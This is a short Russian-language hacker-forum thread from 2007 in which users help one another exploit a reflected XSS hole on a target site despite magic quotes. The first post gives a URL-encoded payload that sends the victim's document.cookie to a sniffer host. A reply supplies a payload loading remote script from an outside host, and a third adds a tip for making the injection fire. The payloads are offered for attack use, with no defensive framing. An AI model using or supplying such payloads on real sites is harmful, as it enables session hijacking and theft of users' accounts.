Как,

Discussion in 'Песочница' started by x-demon, 22 Nov 2007.

  1. x-demon

    x-demon Elder - Старейшина

    Joined:
    10 Jun 2007
    Messages:
    315
    Likes Received:
    101
    Reputations:
    46
    Короче есть уязвимость. Но на сервере включены magic quotes.
    Как обойти? xss пасивная
    somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%27javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E
     
    #1 x-demon, 22 Nov 2007
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,028
    Reputations:
    1,228
    somesite/?order=<script src=http://hek.ru/1.js></script>

    в 1.js пишешь нужный те код
     
    _________________________
    #2 +toxa+, 22 Nov 2007
    1 person likes this.
  3. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    если вдруг не выполнится посмотри в исходник страницы, найди строку, глянь может надо добавить /> после order=
     
    #3 ReVOLVeR, 7 Dec 2007
(You must log in or sign up to post here.)